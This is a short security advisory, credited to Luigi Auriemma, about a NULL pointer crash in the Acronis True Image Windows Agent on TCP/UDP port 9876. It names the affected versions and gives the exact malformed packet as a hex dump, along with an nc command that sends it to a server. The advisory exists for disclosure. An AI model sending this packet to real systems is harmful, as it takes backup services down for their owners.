|
|
| |
The Acronis Agent is "an essential component of Acronis True Image Echo Server (Workstation and Enterprise packages) and is a server running on the TCP and UDP port 9876 which allows the local and remote management of Acronis TrueImage". A vulnerability in the way the Acronis True Image Windows Agent handles incoming traffic allows remote attackers to cause the service to crash.
The Acronis True Image Windows Agent must be not confused with the Acronis Snap Deploy Management Agent which uses the same ports but a different protocol and so it's not affected by this bug. |
| |
Credit:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/acroagent-adv.txt
|
| |
Vulnerable Systems:
* Acronis True Image Windows Agent version 1.0.0.54
* Acronis True Image Enterprise Server version 9.5.0.8072
A NULL pointer vulnerability can be exploited through the sending of a malformed packet to the server causing its immediate termination.
Exploit:
The following hex dump when sent to the server will cause it to crash:
0000000 0005 0000 0002 0001 1600 0003 ff00 ffff
0000010 ffff ffff
Command:
nc SERVER 9876 -v -v < acroagent.txt
|
|
|
|
|
